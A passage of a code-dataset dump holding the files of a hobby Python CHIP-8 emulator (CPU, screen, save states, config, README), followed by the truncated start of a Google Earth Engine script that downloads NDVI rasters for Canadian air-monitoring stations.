destroy(self):\n # Destroy the current screen\n display.quit()" }, { "alpha_fraction": 0.4055970311164856, "alphanum_fraction": 0.449272096157074, "avg_line_length": 31.735801696777344, "blob_id": "9eb0d930db85c50a905d1faee7163479059af4ae", "content_id": "969392565e5b5fcfc79dcb0abc3b3a4b94819b6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13257, "license_type": "no_license", "max_line_length": 80, "num_lines": 405, "path": "/chip8.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "\"\"\" CPU Emulator class. Handles initialization, CPU loop operation, and \nexecution of opcodes.\n\nOpcode information from http://devernay.free.fr/hacks/chip8/C8TECH10.HTM\n\"\"\"\n\nfrom random import randint\nimport winsound\nimport pygame\nimport save\nfrom pygame.locals import (\n K_1,\n K_2,\n K_3,\n K_4,\n K_q,\n K_w,\n K_e,\n K_r,\n K_a,\n K_s,\n K_d,\n K_f,\n K_z,\n K_x,\n K_c,\n K_v,\n K_F11,\n K_F12,\n KEYDOWN,\n KEYUP,\n)\n\nclass Chip8Emulator:\n\n def __init__(self, screen, speed):\n \"\"\"Initialize instance of CPU object. Set up all CPU registers, memory,\n CPU variables, and load fontset into memory.\n \"\"\"\n pygame.init()\n self.screen = screen\n self.pc = 0x200 # Program counter\n self.ir = 0 # Index Register\n self.v = [0] * 16 # CPU Registers\n self.op = 0x0 # Current Opcode\n self.sp = 0 # Stack pointer\n self.programMemoryStartAddress = 0x200\n self.keyPressed = -1\n self.memory = [0] * 4096\n self.stack = [0] * 16\n self.delayTimer = 0\n self.soundTimer = 0\n self.running = True\n self.beepFreq = 2500\n self.beepDuration = 10\n self.speed = speed\n self.saveState = save.Chip8SaveState()\n\n fontSet = {\n 0: [0xF0, 0x90, 0x90, 0x90, 0xF0],\n 1: [0x20, 0x60, 0x20, 0x20, 0x70],\n 2: [0xF0, 0x10, 0xF0, 0x80, 0xF0],\n 3: [0xF0, 0x10, 0xF0, 0x10, 0xF0],\n 4: [0x90, 0x90, 0xF0, 0x10, 0x10],\n 5: [0xF0, 0x80, 0xF0, 0x10, 0xF0],\n 6: [0xF0, 0x80, 0xF0, 0x90, 0xF0],\n 7: [0xF0, 0x10, 0x20, 0x40, 0x40],\n 8: [0xF0, 0x90, 0xF0, 0x90, 0xF0],\n 9: [0xF0, 0x90, 0xF0, 0x10, 0xF0],\n 10: [0xF0, 0x90, 0xF0, 0x90, 0x90],\n 11: [0xE0, 0x90, 0xE0, 0x90, 0xE0],\n 12: [0xF0, 0x80, 0x80, 0x80, 0xF0],\n 13: [0xE0, 0x90, 0x90, 0x90, 0xE0],\n 14: [0xF0, 0x80, 0xF0, 0x80, 0xF0],\n 15: [0xF0, 0x80, 0xF0, 0x80, 0x80],\n }\n\n # Load font set into memory\n i = 0\n for font in fontSet.values():\n for byte in font:\n self.memory[i] = byte\n i += 1\n \n # Create pygame event for timer handling\n self.DECREMENT_TIMER = pygame.USEREVENT + 1\n pygame.time.set_timer(self.DECREMENT_TIMER, 17)\n\n def loadROM(self, file, offset):\n \"\"\"Load the selected ROM into memory at the specified memory offset.\n The CHIP8 CPU loads program memory starting at address 0x200.\n \"\"\"\n data = open(file, 'rb').read()\n for index, byte in enumerate(data):\n self.memory[index + offset] = byte\n\n def _eventHandler(self):\n # Handles events for closing pygame window, keypresses, sound timer\n # beep, and save state. keyPressed value of -1 means invalid key.\n \n\n for event in pygame.event.get():\n if (event.type == pygame.QUIT):\n self.running = False\n\n elif (event.type == KEYDOWN):\n if (event.key == K_F11):\n print(\"Saving current state\")\n self.saveState.saveSaveState(self)\n\n elif (event.key == K_F12):\n if (self.saveState.isSaveStateValid()):\n print(\"Loading save state\")\n self.saveState.loadSaveState(self)\n else:\n print(\"No valid save state!\")\n\n else:\n self.keyPressed = self._keyMap(event.key)\n\n elif (event.type == KEYUP):\n if (self.keyPressed == self._keyMap(event.key)):\n self.keyPressed = -1\n\n elif (event.type == self.DECREMENT_TIMER):\n self._decrementTimers()\n\n if (self.soundTimer > 0):\n winsound.Beep(self.beepFreq, self.beepDuration)\n\n def _keyMap(self, keys):\n # Converts valid key press into hex value. Invalid key press is treated\n # as no key pressed and has value -1.\n \n switcher = {\n K_x: 0x0,\n K_1: 0x1,\n K_2: 0x2,\n K_3: 0x3,\n K_q: 0x4,\n K_w: 0x5,\n K_e: 0x6,\n K_a: 0x7,\n K_s: 0x8,\n K_d: 0x9,\n K_z: 0xA,\n K_c: 0xB,\n K_4: 0xC,\n K_r: 0xD,\n K_f: 0xE,\n K_v: 0xF,\n } \n return switcher.get(keys, -1)\n\n def _fetchOpcode(self):\n # Get opcode from memory at the location stored in the program\n # counter.Need to read in 2 bytes from memory since each memory register\n # holds only 2 bytes and an opcode is 4 bytes in length. Increment the\n # program counter after reading in opcode.\n \n self.op = 0x0\n self.op = (self.memory[self.pc] << 8) | self.memory[self.pc + 1]\n self.pc += 2\n\n def _executeOpcode(self):\n # Parse the opcode into variables. The format is 0x[msd][x][y][lsd]. kk\n # is the 2 smallest bytes and nnn is the 3 smallest bytes. An invalid\n # opcode will cause the program to quit.\n \n msd = self.op >> 12\n x = (self.op & 0x0F00) >> 8\n y = (self.op & 0x00F0) >> 4\n lsd = self.op & 0x000F\n kk = self.op & 0x00FF\n nnn = self.op & 0x0FFF\n\n if (msd == 0):\n if (lsd == 0):\n # 00E0 - CLS. Clear display\n self.screen.clearScreen()\n\n else:\n # 00EE - RET. Return from subroutine. Set PC to top of stack, \n # then decrement SP\n self.pc = self.stack.pop()\n self.sp -= 1\n\n elif (msd == 0x1):\n # 1nnn - JP addr. Set PC to nnn\n self.pc = nnn\n\n elif (msd == 0x2):\n # 2nnn - CALL addr. Increment SP, push current PC to stack, then \n # set PC to nnn\n self.stack.append(self.pc)\n self.pc = nnn\n self.sp += 1\n\n elif (msd == 0x3):\n # 3xkk - SE Vx, byte. Skip next instruction if Vx == kk \n # (increase PC by 2)\n if (self.v[x] == kk):\n self.pc += 2\n\n elif (msd == 0x4):\n # 4xkk - SNE Vx, byte. Skip next instruction if Vx != kk \n # (increase PC by 2)\n if (self.v[x] != kk):\n self.pc += 2\n\n elif (msd == 0x5):\n # 5xy0 - SE Vx, Vy. Skip next instruction if Vx == Vy \n # (increase PC by 2)\n if (self.v[x] == self.v[y]):\n self.pc += 2\n\n elif (msd == 0x6):\n # 6xkk - LD Vx, byte. Set Vx = kk\n self.v[x] = kk\n\n elif (msd == 0x7):\n # 7xkk - ADD vx, byte. Set Vx = Vx + kk\n self.v[x] += kk\n\n if (self.v[x] > 255):\n self.v[x] -= 256\n self.v[0xF] = 1\n\n elif (msd == 0x8):\n if (lsd == 0x0):\n # 8xy0 - LD Vx, Vy. Set Vx = Vy.\n self.v[x] = self.v[y]\n\n elif (lsd == 0x1):\n # 8xy1 - OR Vx, Vy. Set Vx = Vx OR Vy.\n self.v[x] = self.v[x] | self.v[y]\n\n elif (lsd == 0x2):\n # 8xy2 - AND Vx, Vy. Set Vx = Vx AND Vy.\n self.v[x] = self.v[x] & self.v[y]\n\n elif (lsd == 0x3):\n # 8xy3 - XOR Vx, Vy. Set Vx = Vx XOR Vy.\n self.v[x] = self.v[x] ^ self.v[y] \n\n elif (lsd == 0x4):\n # 8xy4 - ADD Vx, Vy. Set Vx = Vx + Vy, set Vf = carry.\n self.v[x] += self.v[y]\n\n if (self.v[x] > 255):\n self.v[x] -= 256\n self.v[0xF] = 1\n\n elif (lsd == 0x5):\n # 8xy5 - SUB Vx, Vy. Set Vx = Vx - Vy, set Vf = NOT borrow.\n self.v[x] -= self.v[y]\n self.v[0xF] = 1\n\n if (self.v[x] < 0):\n self.v[x] += 256\n self.v[0xF] = 0\n\n elif (lsd == 0x6):\n # 8xy6 - SHR Vx {, Vy}. Set Vx = Vx SHR 1. If lsb of Vx is 1, \n # then Vf = 1, else Vf = 0. Then Vx = Vx \\ 2.\n self.v[0xF] = self.v[x] & 0x1\n self.v[x] = self.v[x] >> 1\n\n elif (lsd == 0x7):\n # 8xy7 - SUBN Vx, Vy. Set Vx = Vy - Vx, set Vf = NOT borrow.\n val = self.v[y] - self.v[x]\n self.v[0xF] = 0x1\n\n if (val < 0x0):\n val = val + 0xFF\n self.v[0xF] = 0x0\n\n self.v[x] = val\n\n elif (lsd == 0xE):\n # 8xyE - SHL Vx {, Vy}. Set Vx = Vx SHL 1. If msb of Vx is 1, \n # then Vf = 1, else 0. Then Vx = Vx * 2.\n self.v[0xF] = self.v[x] & 0x80\n self.v[x] = (self.v[x] << 1) & 0xFF\n\n elif (msd == 0x9):\n # 9xy0 - SNE Vx, Vy. Skip next instruction if Vx != Vy \n # (increase PC by 2).\n if (self.v[x] != self.v[y]):\n self.pc += 2\n\n elif (msd == 0xA):\n # Annn - Ld I, addr. Set IR = nnn.\n self.ir = nnn\n\n elif (msd == 0xB):\n # Bnnn - Jp V0, addr. Set PC = V0 + nnn.\n self.pc = self.v[0x0] + nnn\n\n elif (msd == 0xC):\n # Cxkk - RND Vx, byte. Set Vx = random byte [0, 255] AND kk.\n self.v[x] = randint(0, 255) & kk\n\n elif (msd == 0xD):\n # Dxyn - DRW Vx, Vy, nibble. Display n-byte sprite starting at mem \n # location IR at (Vx, Vy), set Vf = collision.\n\n self.v[0xF] = 0\n pixelCollision = False\n\n for i in range(lsd):\n pixelCollision = self.screen.byteToPixel(\n self.v[x], self.v[y] + i, self.memory[self.ir + i])\n\n if (pixelCollision):\n self.v[0xF] = 1\n\n self.screen.update()\n\n elif (msd == 0xE):\n if (lsd == 0xE):\n # Ex9E - SKP Vx. If key pressed on keyboard corresponds with \n # value in Vx, increment PC by 2.\n if (self.keyPressed == self.v[x]):\n self.pc += 2\n\n elif (lsd == 0x1):\n # ExA1 - SKNP Vx. If key not pressed on keyboard corresponds to \n # value in Vx, increment PC by 2.\n if (self.keyPressed != self.v[x]):\n self.pc += 2\n\n elif (msd == 0xF):\n if (y == 0x0):\n if (lsd == 0x7):\n # Fx07 LD Vx, DT. Set Vx = delay timer value.\n self.v[x] = self.delayTimer\n\n if (lsd == 0xA):\n # Fx0A - LD Vx, key. Store value of key press in Vx. All \n # exeution is stopped until key is pressed.\n while (self.keyPressed == -1 and self.running):\n self._eventHandler()\n\n self.v[x] = self.keyPressed\n\n elif (y == 0x1):\n if (lsd == 0x5):\n # Fx15 - LD DT, Vx. Set delay timer = Vx.\n self.delayTimer = self.v[x]\n\n if (lsd == 0x8):\n # Fx18 - LD ST, Vx. Set sound timer = Vx.\n self.soundTimer = self.v[x]\n\n if (lsd == 0xE):\n # Fx1E - Add I, Vx. Set IR = IR + Vx.\n self.ir = self.ir + self.v[x]\n\n elif (y == 0x2):\n # Fx29 - LD F, Vx. Set IR = location of spite for digit Vx.\n self.ir = self.v[x] * 5\n\n elif (y == 0x3):\n # Fx33 - LD B, Vx. Store BCD represention of Vx in mem location \n # IR, IR+1, and I+2.\n num = self.v[x]\n hundredsDigit = num // 100\n num = num % 100\n tensDigit = num // 10\n num = num % 10\n onesDigit = num\n\n self.memory[self.ir] = hundredsDigit\n self.memory[self.ir + 1] = tensDigit\n self.memory[self.ir + 2] = onesDigit\n\n elif (y == 0x5):\n # Fx55 - LD [I], Vx. Store registers V0 to Vx in mem location \n # starting at IR.\n for i in range(x + 1):\n self.memory[self.ir + i] = self.v[i]\n\n elif (y == 0x6):\n # Fx65 - LD Vx, [I]. Read registers V0 to Vx from mem location \n # starting at IR.\n for i in range(x + 1):\n self.v[i] = self.memory[self.ir + i]\n else:\n print(\"Invalid opcode\", hex(self.op), \". Exiting...\")\n self.running = False\n \n def _decrementTimers(self):\n # Decrement the timer values at a rate of 60 Hz. \n self.delayTimer = max(self.delayTimer - 1, 0)\n self.soundTimer = max(self.soundTimer - 1, 0)\n\n def runOneCycle(self):\n \"\"\"Main execution loop. Calls all the required functions to run the\n CHIP8 emulator.\n \"\"\"\n self._eventHandler()\n self._fetchOpcode()\n self._executeOpcode()\n self.screen.update()" }, { "alpha_fraction": 0.373776912689209, "alphanum_fraction": 0.4011741578578949, "avg_line_length": 23.926828384399414, "blob_id": "34372966b7450983149f86a73e6cc65831c531b3", "content_id": "92b4e0365ed2a6abebbed361ee37568d0650d134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1022, "license_type": "no_license", "max_line_length": 94, "num_lines": 41, "path": "/README.md", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "# CHIP-8 CPU Emulator\nA CHIP-8 CPU emulator with additional features.\n\n# Overview of features\n* GUI for ROM selection\n* Adjustable clock speed\n* Adjustable screen scale\n* Single save state (F11 to save, F12 to load)\n\n# Packages Used\n* pygame\n* easygui\n\n# Running\n1. Install the packages listed above.\n2. Run ```main.py```\n\nThe CHIP-8 uses a hexadecimal keyboard for input. The mapping is shown in the following table.\n\n| Chip 8 Key | Keyboard Key |\n| :--------: | :----------: |\n| `1` | `1` |\n| `2` | `2` |\n| `3` | `3` |\n| `4` | `q` |\n| `5` | `w` |\n| `6` | `e` |\n| `7` | `a` |\n| `8` | `s` |\n| `9` | `d` |\n| `0` | `x` |\n| `A` | `z` |\n| `B` | `c` |\n| `C` | `4` |\n| `D` | `r` |\n| `E` | `f` |\n| `F` | `v` |\n\n# Credits\n\n* http://devernay.free.fr/hacks/chip8/C8TECH10.HTM\n" }, { "alpha_fraction": 0.5332496762275696, "alphanum_fraction": 0.5450438857078552, "avg_line_length": 31.145160675048828, "blob_id": "4d5c051609a5109ea7a3217e1a168cf379f88644", "content_id": "e8464ad0068408a747005ddbbf2ba8d4cf522f6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3985, "license_type": "no_license", "max_line_length": 84, "num_lines": 124, "path": "/screen.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "\"\"\"Screen class to handle initialization, drawing, and updating. Top left of\nscreen is (x=0, y=0)\n\"\"\"\n\nfrom pygame import Color, display, draw\n\nPIXEL_OFF = Color(0, 0, 0, 255)\nPIXEL_ON = Color(255, 255, 255, 255)\nPIXEL_WIDTH = 64\nPIXEL_HEIGHT = 32\n\nclass Chip8Screen:\n def __init__(self, scale=10):\n \"\"\"Initialize the screen object variables. The CHIP8 uses a 64x32 pixel \n screen. A custom screen scale can passed to this function to suit any \n size screen.\n \"\"\"\n self.width = PIXEL_WIDTH * scale\n self.height = PIXEL_HEIGHT * scale\n self.scale = scale\n self.pixelMap = []\n\n def initDisplay(self):\n \"\"\"Initiazlizes the screen in pygame with the screen object variables.\n \"\"\"\n display.init()\n self.surface = display.set_mode([self.width, self.height])\n self.clearScreen()\n self.update()\n\n def clearScreen(self):\n \"\"\"Set all pixels on screen to off.\"\"\"\n self.surface.fill(PIXEL_OFF)\n\n def setPixel(self, x, y):\n \"\"\"Set a pixel in the buffer to be on at a specific x, y location. Need\n to call update() to load the buffer onto the screen.\n \"\"\"\n x_pos = x * self.scale\n y_pos = y * self.scale\n\n draw.rect(self.surface, PIXEL_ON, \n (x_pos, y_pos, self.scale, self.scale))\n\n def resetPixel(self, x, y):\n \"\"\"Set a pixel in the buffer to be off at a specific x, y location. Need\n to call update() to laod the buffer onto the screen.\n \"\"\"\n x_pos = x * self.scale\n y_pos = y * self.scale\n\n draw.rect(self.surface, PIXEL_OFF, \n (x_pos, y_pos, self.scale, self.scale))\n\n def getPixel(self, x, y):\n \"\"\"Return true if pixel at position (x, y) is on.\"\"\"\n x_pos = x * self.scale\n y_pos = y * self.scale\n\n pixelState = self.surface.get_at((x_pos, y_pos))\n\n if (pixelState == PIXEL_OFF):\n return False\n else:\n return True\n \n def getPixelMap(self):\n \"\"\"Store the current screen of pixels in a 2D array. Used for save \n states.\n \"\"\"\n self.pixelMap.clear()\n tempMap = []\n\n for y in range(PIXEL_HEIGHT):\n for x in range(PIXEL_WIDTH):\n if (self.getPixel(x, y)):\n tempMap.append(1)\n else:\n tempMap.append(0)\n self.pixelMap.append(tempMap.copy())\n tempMap.clear()\n\n def byteToPixel(self, x, y, byte):\n \"\"\"Draws a byte onto the screen. Since a byte is 8-bits in length, this\n function will draw an 8 pixel wide line starting at location x, y. The\n CHIP8 uses an XOR to draw, so a pixel that is already on will be turned\n off when it is drawn on again. Returns whether a pixel collision \n happened.\n \"\"\"\n setVF = False\n\n for i in range(7, -1, -1):\n mask = 1\n if (byte & (mask << i) != 0):\n # Pixel at (x, y) commanded on\n if (not self.getPixel((x + 7 - i) % PIXEL_WIDTH, y % PIXEL_HEIGHT)):\n # Pixel is off, so turn on this pixel\n self.setPixel((x + 7 - i) % PIXEL_WIDTH, y % PIXEL_HEIGHT)\n else:\n # Pixel is already on, so turn this pixel off and set v[0xF]\n self.resetPixel((x + 7 - i) % PIXEL_WIDTH, y % PIXEL_HEIGHT)\n setVF = True\n \n return setVF\n\n def getWidth(self):\n \"\"\"Get the width of the screen.\"\"\"\n return self.width\n\n def getHeight(self):\n \"\"\"Get the height of the screen.\"\"\"\n return self.height\n\n def getScale(self):\n \"\"\"Get the scale of the screen.\"\"\"\n return self.scale\n\n def update(self):\n \"\"\"Update the screen with the buffer.\"\"\"\n display.flip()\n\n def destroy(self):\n \"\"\"Destroy the current screen.\"\"\"\n display.quit()" }, { "alpha_fraction": 0.5788302421569824, "alphanum_fraction": 0.5845518112182617, "avg_line_length": 34.7613639831543, "blob_id": "e6036bda7043a28998d7e6c82151fe74508fb355", "content_id": "d074148ab0ee5d71d91bcccc40f7a6510ae2bf7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3146, "license_type": "no_license", "max_line_length": 80, "num_lines": 88, "path": "/save.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "\"\"\"Class for handling save state.\"\"\"\n\nPIXEL_WIDTH = 64\nPIXEL_HEIGHT = 32\n\nclass Chip8SaveState():\n def __init__(self):\n \"\"\"Initialize a save state instance. The class variables are nearly the \n same as the main emulator class, however this class also keeps track\n of the screen.\n \"\"\"\n self.saveStateValid = False\n self.pc = 0 # Program counter\n self.ir = 0 # Index Register\n self.v = [] # CPU Registers\n self.op = 0x0 # Current Opcode\n self.sp = 0 # Stack pointer\n self.programMemoryStartAddress = 0\n self.keyPressed = -1\n self.memory = []\n self.stack = []\n self.delayTimer = 0\n self.soundTimer = 0\n self.running = True\n self.beepFreq = 0\n self.beepDuration = 0\n self.speed = 0\n self.screen = []\n \n def saveSaveState(self, cpu):\n \"\"\"Save a copy of the current emulator object and save the current\n screen drawing.\n \"\"\"\n self.saveStateValid = True\n self.pc = cpu.pc # Program counter\n self.ir = cpu.ir # Index Register\n self.v = cpu.v.copy() # CPU Registers\n self.op = cpu.op # Current Opcode\n self.sp = cpu.sp # Stack pointer\n self.programMemoryStartAddress = cpu.programMemoryStartAddress\n self.keyPressed = cpu.keyPressed\n self.memory = cpu.memory.copy()\n self.stack = cpu.stack.copy()\n self.delayTimer = cpu.delayTimer\n self.soundTimer = cpu.soundTimer\n self.running = cpu.running\n self.beepFreq = cpu.beepFreq\n self.beepDuration = cpu.beepDuration\n self.speed = cpu.speed\n\n cpu.screen.getPixelMap()\n self.screen = cpu.screen.pixelMap\n\n def loadSaveState(self, cpu):\n \"\"\"Load the saved copy of the emulator object back into the emulator. \n If there is currently no state saved, then calling this function does\n nothing.\n \"\"\"\n if (self.saveStateValid):\n cpu.pc = self.pc # Program counter\n cpu.ir = self.ir # Index Register\n cpu.v = self.v.copy() # CPU Registers\n cpu.op = self.op # Current Opcode\n cpu.sp = self.sp # Stack pointer\n cpu.programMemoryStartAddress = self.programMemoryStartAddress\n cpu.keyPressed = self.keyPressed\n cpu.memory = self.memory.copy()\n cpu.stack = self.stack.copy()\n cpu.delayTimer = self.delayTimer\n cpu.soundTimer = self.soundTimer\n cpu.running = self.running\n cpu.beepFreq = self.beepFreq\n cpu.beepDuration = self.beepDuration\n cpu.speed = self.speed\n self._drawSaveScreen(cpu)\n\n def isSaveStateValid(self):\n \"\"\"Returns if there is a stored save state.\"\"\"\n return self.saveStateValid\n\n def _drawSaveScreen(self, cpu):\n # Draw the saved screen.\n cpu.screen.clearScreen()\n\n for y in range(PIXEL_HEIGHT):\n for x in range(PIXEL_WIDTH):\n if (cpu.screen.pixelMap[y][x] == 1):\n cpu.screen.setPixel(x, y)" }, { "alpha_fraction": 0.5727332234382629, "alphanum_fraction": 0.5857794880867004, "avg_line_length": 31.617021560668945, "blob_id": "01218dcd7e6756ea5d685bcb5e03f6d32b664665", "content_id": "9c45d0ae9793be1582a05e81508a28487afba966", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1533, "license_type": "no_license", "max_line_length": 77, "num_lines": 47, "path": "/config.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "\"\"\" Configuration code for getting file path for ROM and getting emulator \nvariables for clockspeed and screen scale.\n\"\"\"\n\nimport easygui\n\ndef getEmulatorVariables():\n \"\"\"Open up file selection window to select ROM and emulator variables.\"\"\"\n filePath = easygui.fileopenbox()\n\n # Get emulator variables from user\n msg = \"Enter CHIP-8 emulation variables\"\n title = \"CHIP-8 Setup\"\n fieldNames = [\n \"Clock Speed (Hz) (min 30, max 600)\", \n \"Screen Scale Multiplier (min 1, max 20)\",\n ]\n fieldValues = easygui.multenterbox(msg, title, fieldNames)\n\n while (True):\n if (fieldValues is None):\n break\n \n errmsg = \"\"\n for i in range(len(fieldNames)):\n if (fieldValues[i].strip() == \"\"):\n errmsg = (errmsg \n + ('\"%s\" is a required field.\\n\\n' % fieldNames[i]))\n elif (not fieldValues[i].isdigit()):\n errmsg = (errmsg \n + ('\"%s\" contains non-number values.\\n\\n' \n % fieldNames[i]))\n\n if (errmsg == \"\"):\n break # No problems found\n\n fieldValues = easygui.multenterbox(\n errmsg, title, fieldNames, fieldValues)\n \n userClockSpeed = int(fieldValues[0])\n userScreenScale = int(fieldValues[1])\n\n # Bounds check for emulator variables\n userClockSpeed = max(30, min(userClockSpeed, 600))\n userScreenScale = max(1, min(userScreenScale, 20))\n \n return filePath, userClockSpeed, userScreenScale\n" }, { "alpha_fraction": 0.683363139629364, "alphanum_fraction": 0.692307710647583, "avg_line_length": 23.34782600402832, "blob_id": "651278b17a73b6aa69ff37d3c8b86678dd8a0668", "content_id": "2273f96d73c85d425175bc46956f9a03d82855cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 559, "license_type": "no_license", "max_line_length": 77, "num_lines": 23, "path": "/main.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "\"\"\"Main program.\"\"\"\n\nimport pygame\nimport config\nfrom screen import Chip8Screen\nfrom chip8 import Chip8Emulator\n\nif (__name__ == \"__main__\"):\n \n filePath, userClockSpeed, userScreenScale = config.getEmulatorVariables()\n\n # Initalize emulator\n screen = Chip8Screen(userScreenScale)\n screen.initDisplay()\n cpu = Chip8Emulator(screen, userClockSpeed)\n\n cpu.loadROM(filePath, cpu.programMemoryStartAddress)\n\n while (cpu.running):\n clock = pygame.time.Clock()\n cpu.runOneCycle()\n clock.tick(cpu.speed)\n pygame.quit()" } ]
7
timonpalm/mnist
https://github.com/timonpalm/mnist
6ccdeab5b574057eae9051081a7a04365cda7b97
b907fdb9df54ff9119ade7b29747a58e249b2db7
71b1d67483b300cf21af1123793731e660f28bf4
refs/heads/master
2020-03-22T10:12:33.594713
2018-07-06T18:36:28
2018-07-06T18:36:28
139,887,842
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5924826860427856, "alphanum_fraction": 0.6419386863708496, "avg_line_length": 25.63157844543457, "blob_id": "3ff2e63db941e75eada8240c37e855c09a1f67b6", "content_id": "710a184e15bb5b362babcfbae1ec7cca9825c554", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1011, "license_type": "no_license", "max_line_length": 75, "num_lines": 38, "path": "/neuralNet.py", "repo_name": "timonpalm/mnist", "src_encoding": "UTF-8", "text": "# Imports\nimport numpy as np\nimport tensorflow as tf\n\npic_size = 128*128\n\noutput_nodes = 10\nnodes_hl_1 = 300\nnodes_hl_2 = 300\nnodes_hl_3 = 300\n\ndef model(data):\n\thl_1 = {\"weight\": tf.Variable(tf.random_normal([pic_size, nodes_hl_1])),\n\t\t\t\"bias\": tf.Variable(tf.random_normal(nodes_hl_1))}\n\n\thl_2 = {\"weight\": tf.Variable(tf.random_normal([nodes_hl_1, nodes_hl_2])),\n\t\t\t\"bias\": tf.Variable(tf.random_normal(nodes_hl_2))}\n\n\thl_3 = {\"weight\": tf.Variable(tf.random_normal([nodes_hl_2, nodes_hl_3])),\n\t\t\t\"bias\": tf.Variable(tf.random_normal(nodes_hl_3))}\n\n\tol = {\"weight\": tf.Variable(tf.random_normal([nodes_hl_3, output_nodes])),\n\t\t\t\"bias\": tf.Variable(tf.random_normal(output_nodes))}\n\n\tl1 = tf.add(tf.matmul(data, hl_1[\"weight\"]), hl_1[\"bias\"])\n\tl1 = tf.nn.relu(l1)\n\n\tl1 = tf.add(tf.matmul(l1, hl_2[\"weight\"]), hl_2[\"bias\"])\n\tl1 = tf.nn.relu(l1)\n\n\tl1 = tf.add(tf.matmul(l1, hl_3[\"weight\"]), hl_3[\"bias\"])\n\tl1 = tf.nn.relu(l1)\n\n\toutput = tf.add(tf.matmul(l1, ol[\"weight\"]), ol[\"bias\"])\n\n\treturn output\n\ndef train" } ]
1
larkinandy/Canada_NO2_LUR_14_16
https://github.com/larkinandy/Canada_NO2_LUR_14_16
05802eeb84e8a611c6fd9d0e19321bac531ad131
6ea0987817826fd8e091ac81d5ebf9e1c947b93b
a5acd65fd66aef7ea518339090e5c3d576ce6f0d
refs/heads/master
2020-03-28T23:55:45.775579
2018-11-16T00:30:27
2018-11-16T00:30:27
149,316,085
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6683694124221802, "alphanum_fraction": 0.6760989427566528, "avg_line_length": 41.39031219482422, "blob_id": "c753bf3a73e6e0563d14e9888ffcc15593a86c4d", "content_id": "d43f57fd16b18492ba44d5345dd9cfc48176e3d9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14878, "license_type": "permissive", "max_line_length": 136, "num_lines": 351, "path": "/Processing Scripts/downloadEnvRasters_Canada_LUR.py", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "############## downloadGreenspace.py ###################\n# Author: Andrew Larkin\n# Developed for Perry Hystad, Oregon State University\n# Date last modified: June 5, 2018\n\n# Description: this script downloads annual MODIS NDVI averages from Google Earth Engine.\n# Annual averages range from 2003-2017. NDVI values are based on TOA-scaled reflectance. \n# Multiple Landsat sensors are used to cover the time range as follows:\n\n# Requirements:\n# Active Google Earth Engine account associated with the installed version of Python. \n# ArcGIS with a liscence for the Spatial Analysis Library\n# Tested and developed on:\n# Windows 10\n# Python 2.7\n# ArcGIS 10.3.2\n\n################### setup ####################\n\n# import modules \nimport ee\nimport time\nimport datetime\nimport math\nimport os\nimport sys\nimport arcpy\nimport urllib2\nimport zipfile\nimport pandas as pd\n\n# folder paths and variables\n# the script, input csv need to be in the main folder. Raster images should be downloaded to subfolders within the main folder\nparentFolder = os.path.dirname(sys.argv[0]) + \"/\" \n\n\ninputCSVFile = parentFolder + \"Stations2017_v3_csv_version.csv\" # file with PURE location data\nCSV_DICT = ['NAPS_ID','Lat_Decimal','Long_Decimal','StartYear'] # PURE attributes needed for the analysis\nSTART_YEAR = 2016\nEND_YEAR = 2016\n\ncollectionName = 'LANDSAT/LC8_L1T_32DAY_NDVI' \n\n# environmental variables and checkout necessary extensions and libraries\narcpy.CheckOutExtension(\"Spatial\")\narcpy.env.overwriteOutput = True\nee.Initialize()\n\n# use a water mask to remove NDVI values over water bodies\nwaterMaskCollection = ee.ImageCollection(\"GLCF/GLS_WATER\")\nwaterMask = waterMaskCollection.reduce(ee.Reducer.median())\nwaterMaskScreen = ee.Image(waterMask).neq(2) \n\n# reduce image catalog to a specific year and geographic region of interest\n# INPUTS:\n# byear (str) - year of interest\n# filterBoundaries (ee.Geometry) - Google Earth Engine geometry object defining region of interest\n# collection (ee.ImageCollection) - Goolge Earth Engine image collection object containing rasters of interest\n# OUTPUTS:\n# datedCollect (ee.ImageCollection ) - Google Earth Engine image collection containing filtered raster dataset\ndef filterCatalogSet(byear,filterBoundaries,collection):\n startDate = str(int(byear)) + \"-01-01\"\n endDate = str(byear) + \"-12-31\" \n datedCollect = collection.filterDate(startDate,endDate)\n datedCollect = datedCollect.filterBounds(filterBoundaries)\n return(datedCollect)\n\n# test if all raster images for all years for a specific location have been downloaded \n# INPUTS:\n# inputParams (dict)\n# startYear (int) - start year of data to download rasters for\n# endYear (int) - end year of data to download rasters for\n# randID (int) - random id for the community to identify exposures for\n# folderToTest (str) - full filepath to the folder to test\n# OUTPUTS:\n# boolean - True if folder contains all raster images, false otherwise\ndef testComplete(inputParams,folderToTest):\n startYear = inputParams['startYear']\n endYear = inputParams['endYear']\n randID = inputParams['randID']\n startYear = inputParams['startYear']\n endYear = inputParams['endYear']\n randID = inputParams['randID']\n for year in range(startYear,endYear+1):\n yearFolder = folderToTest + str(year)\n zipFile = yearFolder + \"/\"+ str(randID) + \".zip\" \n if not(os.path.exists(zipFile)):\n return False\n return True\n\n# download all raster images for a single location \n# INPUTS:\n# inputParams (dict)\n# startYear (int) - start year of data to download rasters for\n# endYear (int) - end year of data to download rasters for\n# randID (int) - random id for the community to identify exposures for\n# reducer (ee.reducer) - custom Google Earth Engine object\n# outputFolder (str) - full filepath to where rasters should be saved \ndef downloadSinglePoint(inputParams, reducer,outputFolder):\n 